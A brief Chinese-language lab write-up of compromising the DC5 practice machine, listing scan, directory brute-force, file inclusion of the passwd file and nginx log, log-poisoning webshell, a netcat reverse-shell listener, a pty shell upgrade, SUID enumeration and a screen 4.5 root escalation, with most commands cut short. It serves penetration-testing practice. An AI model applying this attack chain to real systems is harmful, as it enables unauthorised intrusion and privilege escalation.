DC5靶机记录
2023-03-09 10:47:00
DC5 靶机记录
Information
Nmap
1 | sudo nmap -p- -sS -A -sV -vv192.168.1.132 |
Dirseach
1 | dirsearch -u http://192.168.1.132/ |
File://
passwd文件包含可读
nginx日志可读
UploadWebShell
Webshell->NginxLog
GetWebShell
Whoami(www-data)
GetShell
反弹Shell
1 | Kali:nc -lvnp 5555 |
TTYShell
1 | python -c 'import pty; pty.spawn("/bin/bash")' |
SUID - screen4.5 提权
1 | find / -user root -perm /4000 2>/dev/null |
Searchsploit
1 | searchsploit screen 4.5 |
GetPocFile
1 | Kali: |
1 | Kali(Dc5shell): |
Pwn!
1 | Kali((Dc5shell): |
Flag!
1 | find / -name "*flag*" |
1 | cat /root/thisistheflag.txt |
Sum-up
1 | Nmap->80(nginx) |